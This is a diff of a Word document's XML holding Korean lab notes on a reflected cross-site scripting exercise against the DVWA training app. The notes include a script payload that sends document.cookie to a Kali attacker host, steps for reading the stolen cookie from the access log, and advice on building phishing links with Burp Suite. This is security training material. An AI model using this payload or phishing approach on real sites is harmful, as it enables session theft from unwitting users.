+            <wp:docPr id="1486387596" name="그림 1" descr="텍스트, 폰트, 스크린샷, 그래픽이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1486387596" name="그림 1" descr="텍스트, 폰트, 스크린샷, 그래픽이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4147865" cy="602681"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 위의 세션 쿠키를 공격자(kali </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)로 전달하기 위해 웹 서버 시작</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CED857" wp14:editId="1C3FDDF2">
+            <wp:extent cx="4758267" cy="5011957"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+            <wp:docPr id="1429095456" name="그림 1" descr="텍스트, 전자제품, 스크린샷, 소프트웨어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1429095456" name="그림 1" descr="텍스트, 전자제품, 스크린샷, 소프트웨어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4767140" cy="5021303"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 칼리 리눅스의 현재 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 주소는 192.168.56.103</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 서버가 제대로 시작되었다면 웹 브라우저로 접속했을 때, 위와 같은 화면 표시됨</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F9D3C0" wp14:editId="66E89C18">
+            <wp:extent cx="5588431" cy="766233"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1154715938" name="그림 1" descr="텍스트, 스크린샷, 폰트이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1154715938" name="그림 1" descr="텍스트, 스크린샷, 폰트이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5605945" cy="768634"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 실습 중 로그 파일 모니터링을 위한 명령어</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- access.log 파일은 접근 로그를 기록하는 파일 -&gt; 웹 서버로 들어온 요청 정보 기록</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- DVWA 실습 페이지 입력란에 아래와 같은 스크립트 입력</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="aa"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="440" w:type="dxa"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="10016"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10456" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>document.location</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>http://192.168.56.103/cookie?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>+document.cookie&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.location</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">을 이용하여 지정한 위치로 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리다이렉트</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 스크립트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>실행시</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, 웹 브라우저는 공격자의 호스트로 접속</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C17290" wp14:editId="603A17B2">
+            <wp:extent cx="5020733" cy="717179"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="758531935" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라인이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="758531935" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라인이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5050518" cy="721434"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 요청 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>전송시</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리다이렉트</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 후 에러 발생 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440" w:firstLineChars="100" w:firstLine="200"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리다이렉트</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BEA567" wp14:editId="139FEDBC">
+            <wp:extent cx="5490634" cy="1046085"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="631771521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정보이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="631771521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정보이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5529541" cy="1053498"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 해당 실습에서는 접근 로그가 중요</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440" w:firstLine="198"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-&gt; 모니터링하고 있던 접근 로그를 살펴보면 새로운 내용 기록된 것을 확인 가능</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>에 의해 출력된 쿠키 정보</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리플렉티드</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-&gt; 사용자가 취약점이 있는 링크를 클릭하게 만드는 것</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-&gt; Burp Suite의 Proxy 히스토리를 이용해 링크를 확인 가능</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-&gt; 이 요청 메시지를 이용하여 피싱에 사용할 링크 만들 수 있음</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -2376,6 +3260,25 @@
       <w:spacing w:val="5"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="table" w:styleId="aa">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="a1"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00102E31"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
